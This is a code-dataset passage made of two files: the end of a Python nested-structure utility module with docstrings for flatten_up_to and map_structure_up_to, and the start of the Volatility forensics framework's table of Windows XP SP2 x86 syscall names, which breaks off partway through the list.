single-element list: `[input_tree]`.
Use Case:
Sometimes we may wish to partially flatten a nested sequence, retaining some
of the nested structure. We achieve this by specifying a shallow structure,
`shallow_tree`, we wish to flatten up to.
The input, `input_tree`, can be thought of as having the same structure as
`shallow_tree`, but with leaf nodes that are themselves tree structures.
Examples:
```python
input_tree = [[[2, 2], [3, 3]], [[4, 9], [5, 5]]]
shallow_tree = [[True, True], [False, True]]
flattened_input_tree = flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = flatten_up_to(shallow_tree, shallow_tree)
# Output is:
# [[2, 2], [3, 3], [4, 9], [5, 5]]
# [True, True, False, True]
```
```python
input_tree = [[('a', 1), [('b', 2), [('c', 3), [('d', 4)]]]]]
shallow_tree = [['level_1', ['level_2', ['level_3', ['level_4']]]]]
input_tree_flattened_as_shallow_tree = flatten_up_to(shallow_tree, input_tree)
input_tree_flattened = flatten(input_tree)
# Output is:
# [('a', 1), ('b', 2), ('c', 3), ('d', 4)]
# ['a', 1, 'b', 2, 'c', 3, 'd', 4]
```
Non-Sequence Edge Cases:
```python
flatten_up_to(0, 0) # Output: [0]
flatten_up_to(0, [0, 1, 2]) # Output: [[0, 1, 2]]
flatten_up_to([0, 1, 2], 0) # Output: TypeError
flatten_up_to([0, 1, 2], [0, 1, 2]) # Output: [0, 1, 2]
```
Args:
shallow_tree: a possibly pruned structure of input_tree.
input_tree: an arbitrarily nested structure or a scalar object.
Note, numpy arrays are considered scalars.
Returns:
A Python list, the partially flattened version of `input_tree` according to
the structure of `shallow_tree`.
Raises:
TypeError: If `shallow_tree` is a sequence but `input_tree` is not.
TypeError: If the sequence types of `shallow_tree` are different from
`input_tree`.
ValueError: If the sequence lengths of `shallow_tree` are different from
`input_tree`.
"""
assert_shallow_structure(shallow_tree, input_tree)
return list(_yield_flat_up_to(shallow_tree, input_tree))
def map_structure_up_to(shallow_tree, func, *inputs):
"""Applies a function or op to a number of partially flattened inputs.
The `inputs` are flattened up to `shallow_tree` before being mapped.
Use Case:
Sometimes we wish to apply a function to a partially flattened
sequence (for example when the function itself takes sequence inputs). We
achieve this by specifying a shallow structure, `shallow_tree` we wish to
flatten up to.
The `inputs`, can be thought of as having the same structure as
`shallow_tree`, but with leaf nodes that are themselves tree structures.
This function therefore will return something with the same base structure as
`shallow_tree`.
Examples:
```python
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
op_tuple = collections.namedtuple("op_tuple", "add, mul")
inp_val = ab_tuple(a=2, b=3)
inp_ops = ab_tuple(a=op_tuple(add=1, mul=2), b=op_tuple(add=2, mul=3))
out = map_structure_up_to(inp_val, lambda val, ops: (val + ops.add) * ops.mul,
inp_val, inp_ops)
# Output is: ab_tuple(a=6, b=15)
```
```python
data_list = [[2, 4, 6, 8], [[1, 3, 5, 7, 9], [3, 5, 7]]]
name_list = ['evens', ['odds', 'primes']]
out = map_structure_up_to(
name_list,
lambda name, sec: "first_{}_{}".format(len(sec), name),
name_list, data_list)
# Output is: ['first_4_evens', ['first_5_odds', 'first_3_primes']]
```
Args:
shallow_tree: a shallow tree, common to all the inputs.
func: callable which will be applied to each input individually.
*inputs: arbitrarily nested combination of objects that are compatible with
shallow_tree. The function `func` is applied to corresponding
partially flattened elements of each input, so the function must support
arity of `len(inputs)`.
Raises:
TypeError: If `shallow_tree` is a sequence but `input_tree` is not.
TypeError: If the sequence types of `shallow_tree` are different from
`input_tree`.
ValueError: If the sequence lengths of `shallow_tree` are different from
`input_tree`.
Returns:
result of repeatedly applying `func`, with same structure as
`shallow_tree`.
"""
if not inputs:
raise ValueError("Cannot map over no sequences")
for input_tree in inputs:
assert_shallow_structure(shallow_tree, input_tree)
# Flatten each input separately, apply the function to corresponding elements,
# then repack based on the structure of the first input.
all_flattened_up_to = [flatten_up_to(shallow_tree, input_tree)
for input_tree in inputs]
results = [func(*tensors) for tensors in zip(*all_flattened_up_to)]
return pack_sequence_as(structure=shallow_tree, flat_sequence=results)
def get_traverse_shallow_structure(traverse_fn, structure):
"""Generates a shallow structure from a `traverse_fn` and `structure`.
`traverse_fn` must accept any possible subtree of `structure` and return
a depth=1 structure containing `True` or `False` values, describing which
of the top-level subtrees may be traversed. It may also
return scalar `True` or `False` "traversal is OK / not OK for all subtrees."
Examples are available in the unit tests (nest_test.py).
Args:
traverse_fn: Function taking a substructure and returning either a scalar
`bool` (whether to traverse that substructure or not) or a depth=1
shallow structure of the same type, describing which parts of the
substructure to traverse.
structure: The structure to traverse.
Returns:
A shallow structure containing python bools, which can be passed to
`map_structure_up_to` and `flatten_up_to`.
Raises:
TypeError: if `traverse_fn` returns a sequence for a non-sequence input,
or a structure with depth higher than 1 for a sequence input,
or if any leaf values in the returned structure or scalar are not type
`bool`.
"""
to_traverse = traverse_fn(structure)
if not is_sequence(structure):
if not isinstance(to_traverse, bool):
raise TypeError("traverse_fn returned structure: %s for non-structure: %s"
% (to_traverse, structure))
return to_traverse
level_traverse = []
if isinstance(to_traverse, bool):
if not to_traverse:
# Do not traverse this substructure at all. Exit early.
return False
else:
# Traverse the entire substructure.
for branch in _yield_value(structure):
level_traverse.append(
get_traverse_shallow_structure(traverse_fn, branch))
elif not is_sequence(to_traverse):
raise TypeError("traverse_fn returned a non-bool scalar: %s for input: %s"
% (to_traverse, structure))
else:
# Traverse some subset of this substructure.
assert_shallow_structure(to_traverse, structure)
for t, branch in zip(_yield_value(to_traverse), _yield_value(structure)):
if not isinstance(t, bool):
raise TypeError(
"traverse_fn didn't return a depth=1 structure of bools. saw: %s "
" for structure: %s" % (to_traverse, structure))
if t:
level_traverse.append(
get_traverse_shallow_structure(traverse_fn, branch))
else:
level_traverse.append(False)
return _sequence_like(structure, level_traverse)
def yield_flat_paths(nest):
"""Yields paths for some nested structure.
Paths are lists of objects which can be str-converted, which may include
integers or other types which are used as indices in a dict.
The flat list will be in the corresponding order as if you called
`snt.nest.flatten` on the structure. This is handy for naming Tensors such
the TF scope structure matches the tuple structure.
E.g. if we have a tuple `value = Foo(a=3, b=Bar(c=23, d=42))`
```shell
>>> nest.flatten(value)
[3, 23, 42]
>>> list(nest.yield_flat_paths(value))
[('a',), ('b', 'c'), ('b', 'd')]
```
```shell
>>> list(nest.yield_flat_paths({'a': [3]}))
[('a', 0)]
>>> list(nest.yield_flat_paths({'a': 3}))
[('a',)]
```
Args:
nest: the value to produce a flattened paths list for.
Yields:
Tuples containing index or key values which form the path to a specific
leaf value in the nested structure.
"""
# The _maybe_add_final_path_element function is used below in order to avoid
# adding trailing slashes when the sub-element recursed into is a leaf.
if isinstance(nest, (dict, _collections.Mapping)):
for key in _sorted(nest):
value = nest[key]
for sub_path in yield_flat_paths(value):
yield (key,) + sub_path
elif _is_namedtuple(nest):
for key in nest._fields:
value = getattr(nest, key)
for sub_path in yield_flat_paths(value):
yield (key,) + sub_path
elif isinstance(nest, _six.string_types):
yield ()
elif isinstance(nest, _collections.Sequence):
for idx, value in enumerate(nest):
for sub_path in yield_flat_paths(value):
yield (idx,) + sub_path
else:
yield ()
def flatten_with_joined_string_paths(structure, separator="/"):
"""Returns a list of (string path, data element) tuples.
The order of tuples produced matches that of `nest.flatten`. This allows you
to flatten a nested structure while keeping information about where in the
structure each data element was located. See `nest.yield_flat_paths`
for more information.
Args:
structure: the nested structure to flatten.
separator: string to separate levels of hierarchy in the results, defaults
to '/'.
Returns:
A list of (string, data element) tuples.
"""
flat_paths = yield_flat_paths(structure)
def stringify_and_join(path_elements):
return separator.join(str(path_element) for path_element in path_elements)
flat_string_paths = [stringify_and_join(path) for path in flat_paths]
return list(zip(flat_string_paths, flatten(structure)))
_pywrap_tensorflow.RegisterType("Mapping", _collections.Mapping)
_pywrap_tensorflow.RegisterType("Sequence", _collections.Sequence)
| apache-2.0 |
shantanu561993/volatility | volatility/plugins/overlays/windows/xp_sp2_x86_syscalls.py | 58 | 34509 | # Volatility
# Copyright (c) 2008-2013 Volatility Foundation
# Copyright (c) 2011 Michael Hale Ligh <michael.hale@gmail.com>
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
syscalls = [
[
'NtAcceptConnectPort', # 0x0
'NtAccessCheck', # 0x1
'NtAccessCheckAndAuditAlarm', # 0x2
'NtAccessCheckByType', # 0x3
'NtAccessCheckByTypeAndAuditAlarm', # 0x4
'NtAccessCheckByTypeResultList', # 0x5
'NtAccessCheckByTypeResultListAndAuditAlarm', # 0x6
'NtAccessCheckByTypeResultListAndAuditAlarmByHandle', # 0x7
'NtAddAtom', # 0x8
'NtAddBootEntry', # 0x9
'NtAdjustGroupsToken', # 0xa
'NtAdjustPrivilegesToken', # 0xb
'NtAlertResumeThread', # 0xc
'NtAlertThread', # 0xd
'NtAllocateLocallyUniqueId', # 0xe
'NtAllocateUserPhysicalPages', # 0xf
'NtAllocateUuids', # 0x10
'NtAllocateVirtualMemory', # 0x11
'NtAreMappedFilesTheSame', # 0x12
'NtAssignProcessToJobObject', # 0x13
'NtCallbackReturn', # 0x14
'NtCancelDeviceWakeupRequest', # 0x15
'NtCancelIoFile', # 0x16
'NtCancelTimer', # 0x17
'NtClearEvent', # 0x18
'NtClose', # 0x19
'NtCloseObjectAuditAlarm', # 0x1a
'NtCompactKeys', # 0x1b
'NtCompareTokens', # 0x1c
'NtCompleteConnectPort', # 0x1d
'NtCompressKey', # 0x1e
'NtConnectPort', # 0x1f
'NtContinue', # 0x20
'NtCreateDebugObject', # 0x21
'NtCreateDirectoryObject', # 0x22
'NtCreateEvent', # 0x23
'NtCreateEventPair', # 0x24
'NtCreateFile', # 0x25
'NtCreateIoCompletion', # 0x26
'NtCreateJobObject', # 0x27
'NtCreateJobSet', # 0x28
'NtCreateKey', # 0x29
'NtCreateMailslotFile', # 0x2a
'NtCreateMutant', # 0x2b
'NtCreateNamedPipeFile', # 0x2c
'NtCreatePagingFile', # 0x2d
'NtCreatePort', # 0x2e
'NtCreateProcess', # 0x2f
'NtCreateProcessEx', # 0x30
'NtCreateProfile', # 0x31
'NtCreateSection', # 0x32
'NtCreateSemaphore', # 0x33
'NtCreateSymbolicLinkObject', # 0x34
'NtCreateThread', # 0x35
'NtCreateTimer', # 0x36
'NtCreateToken', # 0x37
'NtCreateWaitablePort', # 0x38
'NtDebugActiveProcess', # 0x39
'NtDebugContinue', # 0x3a
'NtDelayExecution', # 0x3b
'NtDeleteAtom', # 0x3c
'NtDeleteBootEntry', # 0x3d
'NtDeleteFile', # 0x3e
'NtDeleteKey', # 0x3f
'NtDeleteObjectAuditAlarm', # 0x40
'NtDeleteValueKey', # 0x41
'NtDeviceIoControlFile', # 0x42
'NtDisplayString', # 0x43
'NtDuplicateObject', # 0x44
'NtDuplicateToken', # 0x45
'NtEnumerateBootEntries', # 0x46
'NtEnumerateKey', # 0x47
'NtEnumerateSystemEnvironmentValuesEx', # 0x48
'NtEnumerateValueKey', # 0x49
'NtExtendSection', # 0x4a
'NtFilterToken', # 0x4b
'NtFindAtom', # 0x4c
'NtFlushBuffersFile', # 0x4d
'NtFlushInstructionCache', # 0x4e
'NtFlushKey', # 0x4f
'NtFlushVirtualMemory', # 0x50
'NtFlushWriteBuffer', # 0x51
'NtFreeUserPhysicalPages', # 0x52
'NtFreeVirtualMemory', # 0x53
'NtFsControlFile', # 0x54
'NtGetContextThread', # 0x55
'NtGetDevicePowerState', # 0x56
'NtGetPlugPlayEvent', # 0x57
'NtGetWriteWatch', # 0x58
'NtImpersonateAnonymousToken', # 0x59
'NtImpersonateClientOfPort', # 0x5a
'NtImpersonateThread', # 0x5b
'NtInitializeRegistry', # 0x5c
'NtInitiatePowerAction', # 0x5d
'NtIsProcessInJob', # 0x5e
'NtIsSystemResumeAutomatic', # 0x5f
'NtListenPort', # 0x60
'NtLoadDriver', # 0x61
'NtLoadKey', # 0x62
'NtLoadKey2', # 0x63
'NtLockFile', # 0x64
'NtLockProductActivationKeys', # 0x65
'NtLockRegistryKey', # 0x66
'NtLockVirtualMemory', # 0x67
'NtMakePermanentObject', # 0x68
'NtMakeTemporaryObject', # 0x69
'NtMapUserPhysicalPages', # 0x6a
'NtMapUserPhysicalPagesScatter', # 0x6b
'NtMapViewOfSection', # 0x6c
'NtModifyBootEntry', # 0x6d
'NtNotifyChangeDirectoryFile', # 0x6e
'NtNotifyChangeKey', # 0x6f
'NtNotifyChangeMultipleKeys', # 0x70
'NtOpenDirectoryObject', # 0x71
'NtOpenEvent', # 0x72
'NtOpenEventPair', # 0x73
'NtOpenFile', # 0x74
'NtOpenIoCompletion', # 0x75
'NtOpenJobObject', # 0x76
'NtOpenKey', # 0x77
'NtOpenMutant', # 0x78
'NtOpenObjectAuditAlarm', # 0x79
'NtOpenProcess', # 0x7a
'NtOpenProcessToken', # 0x7b
'NtOpenProcessTokenEx', # 0x7c
'NtOpenSection', # 0x7d
'NtOpenSemaphore', # 0x7e
'NtOpenSymbolicLinkObject', # 0x7f
'NtOpenThread', # 0x80
'NtOpenThreadToken', # 0x81
'NtOpenThreadTokenEx', # 0x82
'NtOpenTimer', # 0x83
'NtPlugPlayControl', # 0x84
'NtPowerInformation', # 0x85
'NtPrivilegeCheck', # 0x86
'NtPrivilegeObjectAuditAlarm', # 0x87
'NtPrivilegedServiceAuditAlarm', # 0x88
'NtProtectVirtualMemory', # 0x89
'NtPulseEvent', # 0x8a
'NtQueryAttributesFile', # 0x8b
'NtQueryBootEntryOrder', # 0x8c
'NtQueryBootOptions', # 0x8d
'NtQueryDebugFilterState', # 0x8e
'NtQueryDefaultLocale', # 0x8f
'NtQueryDefaultUILanguage', # 0x90
'NtQueryDirectoryFile', # 0x91
'NtQueryDirectoryObject', # 0x92
'NtQueryEaFile', # 0x93
'NtQueryEvent', # 0x94
'NtQueryFullAttributesFile', # 0x95
'NtQueryInformationAtom', # 0x96
'NtQueryInformationFile', # 0x97
'NtQueryInformationJobObject', # 0x98
'NtQueryInformationPort', # 0x99
'NtQueryInformationProcess', # 0x9a
'NtQueryInformationThread', # 0x9b
'NtQueryInformationToken', # 0x9c
'NtQueryInstallUILanguage', # 0x9d
'NtQueryIntervalProfile', # 0x9e
'NtQueryIoCompletion', # 0x9f
'NtQueryKey', # 0xa0
'NtQueryMultipleValueKey', # 0xa1
'NtQueryMutant', # 0xa2
'NtQueryObject', # 0xa3
'NtQueryOpenSubKeys', # 0xa4
'NtQueryPerformanceCounter', # 0xa5
'NtQueryQuotaInformationFile', # 0xa6
'NtQuerySection', # 0xa7
'NtQuerySecurityObject', # 0xa8
'NtQuerySemaphore', # 0xa9
'NtQuerySymbolicLinkObject', # 0xaa
'NtQuerySystemEnvironmentValue', # 0xab
'NtQuerySystemEnvironmentValueEx', # 0xac
'NtQuerySystemInformation', # 0xad
'NtQuerySystemTime', # 0xae
'NtQueryTimer', # 0xaf
'NtQueryTimerResolution', # 0xb0
'NtQueryValueKey', # 0xb1
'NtQueryVirtualMemory', # 0xb2
'NtQueryVolumeInformationFile', # 0xb3
'NtQueueApcThread', # 0xb4
'NtRaiseException', # 0xb5
'NtRaiseHardError', # 0xb6
'NtReadFile', # 0xb7
'NtReadFileScatter', # 0xb8
'NtReadRequestData', # 0xb9
'NtReadVirtualMemory', # 0xba
'NtRegisterThreadTerminatePort', # 0xbb
'NtReleaseMutant', # 0xbc
'NtReleaseSemaphore', # 0xbd
'NtRemoveIoCompletion', # 0xbe
'NtRemoveProcessDebug', # 0xbf
'NtRenameKey', # 0xc0
'NtReplaceKey', # 0xc1
'NtReplyPort', # 0xc2
'NtReplyWaitReceivePort', # 0xc3
'NtReplyWaitReceivePortEx', # 0xc4
'NtReplyWaitReplyPort', # 0xc5
'NtRequestDeviceWakeup', # 0xc6
'NtRequestPort', # 0xc7
'NtRequestWaitReplyPort', # 0xc8
'NtRequestWakeupLatency', # 0xc9
'NtResetEvent', # 0xca
'NtResetWriteWatch', # 0xcb
'NtRestoreKey', # 0xcc
'NtResumeProcess', # 0xcd
'NtResumeThread', # 0xce
'NtSaveKey', # 0xcf
'NtSaveKeyEx', # 0xd0
'NtSaveMergedKeys', # 0xd1
'NtSecureConnectPort', # 0xd2
'NtSetBootEntryOrder', # 0xd3
'NtSetBootOptions', # 0xd4
'NtSetContextThread', # 0xd5
'NtSetDebugFilterState', # 0xd6
'NtSetDefaultHardErrorPort', # 0xd7
'NtSetDefaultLocale', # 0xd8
'NtSetDefaultUILanguage', # 0xd9
'NtSetEaFile', # 0xda
'NtSetEvent', # 0xdb
'NtSetEventBoostPriority', # 0xdc
'NtSetHighEventPair', # 0xdd
'NtSetHighWaitLowEventPair', # 0xde
'NtSetInformationDebugObject', # 0xdf
'NtSetInformationFile', # 0xe0
'NtSetInformationJobObject', # 0xe1
'NtSetInformationKey', # 0xe2
'NtSetInformationObject', # 0xe3
'NtSetInformationProcess', # 0xe4
'NtSetInformationThread', # 0xe5
'NtSetInformationToken', # 0xe6
'NtSetIntervalProfile', # 0xe7
'NtSetIoCompletion', # 0xe8
'NtSetLdtEntries', # 0xe9
'NtSetLowEventPair', # 0xea
'NtSetLowWaitHighEventPair', # 0xeb
'NtSetQuotaInformationFile', # 0xec
'NtSetSecurityObject', # 0xed
'NtSetSystemEnvironmentValue', # 0xee
'NtSetSystemEnvironmentValueEx', # 0xef
'NtSetSystemInformation', # 0xf0
'NtSetSystemPowerState', # 0xf1
'NtSetSystemTime', # 0xf2
'NtSetThreadExecutionState', # 0xf3
'NtSetTimer', # 0xf4
'NtSetTimerResolution', # 0xf5
'NtSetUuidSeed', # 0xf6
'NtSetValueKey', # 0xf7
'NtSetVolumeInformationFile', # 0xf8
'NtShutdownSystem', # 0xf9
'NtSignalAndWaitForSingleObject', # 0xfa
'NtStartProfile', # 0xfb
'NtStopProfile', # 0xfc
'NtSuspendProcess', # 0xfd
'NtSuspendThread', # 0xfe
'NtSystemDebugControl', # 0xff
'NtTerminateJobObject', # 0x100
'NtTerminateProcess', # 0x101
'NtTerminateThread', # 0x102
'NtTestAlert', # 0x103
'NtTraceEvent', # 0x104
'NtTranslateFilePath', # 0x105
'NtUnloadDriver', # 0x106
'NtUnloadKey', # 0x107
'NtUnloadKeyEx', # 0x108
'NtUnlockFile', # 0x109
'NtUnlockVirtualMemory', # 0x10a
'NtUnmapViewOfSection', # 0x10b
'NtVdmControl', # 0x10c
'NtWaitForDebugEvent', # 0x10d
'NtWaitForMultipleObjects', # 0x10e
'NtWaitForSingleObject', # 0x10f
'NtWaitHighEventPair', # 0x110
'NtWaitLowEventPair', # 0x111
'NtWriteFile', # 0x112
'NtWriteFileGather', # 0x113
'NtWriteRequestData', # 0x114
'NtWriteVirtualMemory', # 0x115
'NtYieldExecution', # 0x116
'NtCreateKeyedEvent', # 0x117
'NtOpenKeyedEvent', # 0x118
'NtReleaseKeyedEvent', # 0x119
'NtWaitForKeyedEvent', # 0x11a
'NtQueryPortInformationProcess', # 0x11b
],
[
'NtGdiAbortDoc', # 0x0
'NtGdiAbortPath', # 0x1
'NtGdiAddFontResourceW', # 0x2
'NtGdiAddRemoteFontToDC', # 0x3
'NtGdiAddFontMemResourceEx', # 0x4
'NtGdiRemoveMergeFont', # 0x5
'NtGdiAddRemoteMMInstanceToDC', # 0x6
'NtGdiAlphaBlend', # 0x7
'NtGdiAngleArc', # 0x8
'NtGdiAnyLinkedFonts', # 0x9
'NtGdiFontIsLinked', # 0xa
'NtGdiArcInternal', # 0xb
'NtGdiBeginPath', # 0xc
'NtGdiBitBlt', # 0xd
'NtGdiCancelDC', # 0xe
'NtGdiCheckBitmapBits', # 0xf
'NtGdiCloseFigure', # 0x10
'NtGdiClearBitmapAttributes', # 0x11
'NtGdiClearBrushAttributes', # 0x12
'NtGdiColorCorrectPalette', # 0x13
'NtGdiCombineRgn', # 0x14
'NtGdiCombineTransform', # 0x15
'NtGdiComputeXformCoefficients', # 0x16
'NtGdiConsoleTextOut', # 0x17
'NtGdiConvertMetafileRect', # 0x18
'NtGdiCreateBitmap', # 0x19
'NtGdiCreateClientObj', # 0x1a
'NtGdiCreateColorSpace', # 0x1b
'NtGdiCreateColorTransform', # 0x1c
'NtGdiCreateCompatibleBitmap', # 0x1d
'NtGdiCreateCompatibleDC', # 0x1e
'NtGdiCreateDIBBrush', # 0x1f
'NtGdiCreateDIBitmapInternal', # 0x20
'NtGdiCreateDIBSection', # 0x21
'NtGdiCreateEllipticRgn', # 0x22
'NtGdiCreateHalftonePalette', # 0x23
'NtGdiCreateHatchBrushInternal', # 0x24
'NtGdiCreateMetafileDC', # 0x25
'NtGdiCreatePaletteInternal', # 0x26
'NtGdiCreatePatternBrushInternal', # 0x27
'NtGdiCreatePen', # 0x28
'NtGdiCreateRectRgn', # 0x29
'NtGdiCreateRoundRectRgn', # 0x2a
'NtGdiCreateServerMetaFile', # 0x2b
'NtGdiCreateSolidBrush', # 0x2c
'NtGdiD3dContextCreate', # 0x2d
'NtGdiD3dContextDestroy', # 0x2e
'NtGdiD3dContextDestroyAll', # 0x2f
'NtGdiD3dValidateTextureStageState', # 0x30
'NtGdiD3dDrawPrimitives2', # 0x31
'NtGdiDdGetDriverState', # 0x32
'NtGdiDdAddAttachedSurface', # 0x33
'NtGdiDdAlphaBlt', # 0x34
'NtGdiDdAttachSurface', # 0x35
'NtGdiDdBeginMoCompFrame', # 0x36
'NtGdiDdBlt', # 0x37
'NtGdiDdCanCreateSurface', # 0x38
'NtGdiDdCanCreateD3DBuffer', # 0x39
'NtGdiDdColorControl', # 0x3a
'NtGdiDdCreateDirectDrawObject', # 0x3b
'NtGdiDdCreateSurface', # 0x3c
'NtGdiDdCreateD3DBuffer', # 0x3d
'NtGdiDdCreateMoComp', # 0x3e
'NtGdiDdCreateSurfaceObject', # 0x3f
'NtGdiDdDeleteDirectDrawObject', # 0x40
'NtGdiDdDeleteSurfaceObject', # 0x41
'NtGdiDdDestroyMoComp', # 0x42
'NtGdiDdDestroySurface', # 0x43
'NtGdiDdDestroyD3DBuffer', # 0x44
'NtGdiDdEndMoCompFrame', # 0x45
'NtGdiDdFlip', # 0x46
'NtGdiDdFlipToGDISurface', # 0x47
'NtGdiDdGetAvailDriverMemory', # 0x48
'NtGdiDdGetBltStatus', # 0x49
'NtGdiDdGetDC', # 0x4a
'NtGdiDdGetDriverInfo', # 0x4b
'NtGdiDdGetDxHandle', # 0x4c
'NtGdiDdGetFlipStatus', # 0x4d
'NtGdiDdGetInternalMoCompInfo', # 0x4e
'NtGdiDdGetMoCompBuffInfo', # 0x4f
'NtGdiDdGetMoCompGuids', # 0x50
'NtGdiDdGetMoCompFormats', # 0x51
'NtGdiDdGetScanLine', # 0x52
'NtGdiDdLock', # 0x53
'NtGdiDdLockD3D', # 0x54
'NtGdiDdQueryDirectDrawObject', # 0x55
'NtGdiDdQueryMoCompStatus', # 0x56
'NtGdiDdReenableDirectDrawObject', # 0x57
'NtGdiDdReleaseDC', # 0x58
'NtGdiDdRenderMoComp', # 0x59
'NtGdiDdResetVisrgn', # 0x5a
'NtGdiDdSetColorKey', # 0x5b
'NtGdiDdSetExclusiveMode', # 0x5c
'NtGdiDdSetGammaRamp', # 0x5d
'NtGdiDdCreateSurfaceEx', # 0x5e
'NtGdiDdSetOverlayPosition', # 0x5f
'NtGdiDdUnattachSurface', # 0x60
'NtGdiDdUnlock', # 0x61
'NtGdiDdUnlockD3D', # 0x62
'NtGdiDdUpdateOverlay', # 0x63
'NtGdiDdWaitForVerticalBlank', # 0x64
'NtGdiDvpCanCreateVideoPort', # 0x65
'NtGdiDvpColorControl', # 0x66
'NtGdiDvpCreateVideoPort', # 0x67
'NtGdiDvpDestroyVideoPort', # 0x68
'NtGdiDvpFlipVideoPort', # 0x69
'NtGdiDvpGetVideoPortBandwidth', # 0x6a
'NtGdiDvpGetVideoPortField', # 0x6b
'NtGdiDvpGetVideoPortFlipStatus', # 0x6c
'NtGdiDvpGetVideoPortInputFormats', # 0x6d
'NtGdiDvpGetVideoPortLine', # 0x6e
'NtGdiDvpGetVideoPortOutputFormats', # 0x6f
'NtGdiDvpGetVideoPortConnectInfo', # 0x70
'NtGdiDvpGetVideoSignalStatus', # 0x71
'NtGdiDvpUpdateVideoPort', # 0x72
'NtGdiDvpWaitForVideoPortSync', # 0x73
'NtGdiDvpAcquireNotification', # 0x74
'NtGdiDvpReleaseNotification', # 0x75
'NtGdiDxgGenericThunk', # 0x76
'NtGdiDeleteClientObj', # 0x77
'NtGdiDeleteColorSpace', # 0x78
'NtGdiDeleteColorTransform', # 0x79
'NtGdiDeleteObjectApp', # 0x7a
'NtGdiDescribePixelFormat', # 0x7b
'NtGdiGetPerBandInfo', # 0x7c
'NtGdiDoBanding', # 0x7d
'NtGdiDoPalette', # 0x7e
'NtGdiDrawEscape', # 0x7f
'NtGdiEllipse', # 0x80
'NtGdiEnableEudc', # 0x81
'NtGdiEndDoc', # 0x82
'NtGdiEndPage', # 0x83
'NtGdiEndPath', # 0x84
'NtGdiEnumFontChunk', # 0x85
'NtGdiEnumFontClose', # 0x86
'NtGdiEnumFontOpen', # 0x87
'NtGdiEnumObjects', # 0x88
'NtGdiEqualRgn', # 0x89
'NtGdiEudcLoadUnloadLink', # 0x8a
'NtGdiExcludeClipRect', # 0x8b
'NtGdiExtCreatePen', # 0x8c
'NtGdiExtCreateRegion', # 0x8d
'NtGdiExtEscape', # 0x8e
'NtGdiExtFloodFill', # 0x8f
'NtGdiExtGetObjectW', # 0x90
'NtGdiExtSelectClipRgn', # 0x91
'NtGdiExtTextOutW', # 0x92
'NtGdiFillPath', # 0x93
'NtGdiFillRgn', # 0x94
'NtGdiFlattenPath', # 0x95
'NtGdiFlushUserBatch', # 0x96
'NtGdiFlush', # 0x97
'NtGdiForceUFIMapping', # 0x98
'NtGdiFrameRgn', # 0x99
'NtGdiFullscreenControl', # 0x9a
'NtGdiGetAndSetDCDword', # 0x9b
'NtGdiGetAppClipBox', # 0x9c
'NtGdiGetBitmapBits', # 0x9d
'NtGdiGetBitmapDimension', # 0x9e
'NtGdiGetBoundsRect', # 0x9f
'NtGdiGetCharABCWidthsW', # 0xa0
'NtGdiGetCharacterPlacementW', # 0xa1
'NtGdiGetCharSet', # 0xa2
'NtGdiGetCharWidthW', # 0xa3
'NtGdiGetCharWidthInfo', # 0xa4
'NtGdiGetColorAdjustment', # 0xa5
'NtGdiGetColorSpaceforBitmap', # 0xa6
'NtGdiGetDCDword', # 0xa7
'NtGdiGetDCforBitmap', # 0xa8
'NtGdiGetDCObject', # 0xa9
'NtGdiGetDCPoint', # 0xaa
'NtGdiGetDeviceCaps', # 0xab
'NtGdiGetDeviceGammaRamp', # 0xac
'NtGdiGetDeviceCapsAll', # 0xad
'NtGdiGetDIBitsInternal', # 0xae
'NtGdiGetETM', # 0xaf
'NtGdiGetEudcTimeStampEx', # 0xb0
'NtGdiGetFontData', # 0xb1
'NtGdiGetFontResourceInfoInternalW', # 0xb2
'NtGdiGetGlyphIndicesW', # 0xb3
'NtGdiGetGlyphIndicesWInternal', # 0xb4
'NtGdiGetGlyphOutline', # 0xb5
'NtGdiGetKerningPairs', # 0xb6
'NtGdiGetLinkedUFIs', # 0xb7
'NtGdiGetMiterLimit', # 0xb8
'NtGdiGetMonitorID', # 0xb9
'NtGdiGetNearestColor', # 0xba
'NtGdiGetNearestPaletteIndex', # 0xbb
'NtGdiGetObjectBitmapHandle', # 0xbc
'NtGdiGetOutlineTextMetricsInternalW', # 0xbd
'NtGdiGetPath', # 0xbe
'NtGdiGetPixel', # 0xbf
'NtGdiGetRandomRgn', # 0xc0
'NtGdiGetRasterizerCaps', # 0xc1
'NtGdiGetRealizationInfo', # 0xc2
'NtGdiGetRegionData', # 0xc3
'NtGdiGetRgnBox', # 0xc4
'NtGdiGetServerMetaFileBits', # 0xc5
'NtGdiGetSpoolMessage', # 0xc6
'NtGdiGetStats', # 0xc7
'NtGdiGetStockObject', # 0xc8
'NtGdiGetStringBitmapW', # 0xc9
'NtGdiGetSystemPaletteUse', # 0xca
'NtGdiGetTextCharsetInfo', # 0xcb
'NtGdiGetTextExtent', # 0xcc
'NtGdiGetTextExtentExW', # 0xcd
'NtGdiGetTextFaceW', # 0xce
'NtGdiGetTextMetricsW', # 0xcf
'NtGdiGetTransform', # 0xd0
'NtGdiGetUFI', # 0xd1
'NtGdiGetEmbUFI', # 0xd2
'NtGdiGetUFIPathname', # 0xd3
'NtGdiGetEmbedFonts', # 0xd4
'NtGdiChangeGhostFont', # 0xd5
'NtGdiAddEmbFontToDC', # 0xd6
'NtGdiGetFontUnicodeRanges', # 0xd7
'NtGdiGetWidthTable', # 0xd8
'NtGdiGradientFill', # 0xd9
'NtGdiHfontCreate', # 0xda
'NtGdiIcmBrushInfo', # 0xdb
'NtGdiInit', # 0xdc
'NtGdiInitSpool', # 0xdd
'NtGdiIntersectClipRect', # 0xde
'NtGdiInvertRgn', # 0xdf
'NtGdiLineTo', # 0xe0
'NtGdiMakeFontDir', # 0xe1
'NtGdiMakeInfoDC', # 0xe2
'NtGdiMaskBlt', # 0xe3
'NtGdiModifyWorldTransform', # 0xe4
'NtGdiMonoBitmap', # 0xe5
'NtGdiMoveTo', # 0xe6
'NtGdiOffsetClipRgn', # 0xe7
'NtGdiOffsetRgn', # 0xe8
'NtGdiOpenDCW', # 0xe9
'NtGdiPatBlt', # 0xea
'NtGdiPolyPatBlt', # 0xeb
'NtGdiPathToRegion', # 0xec
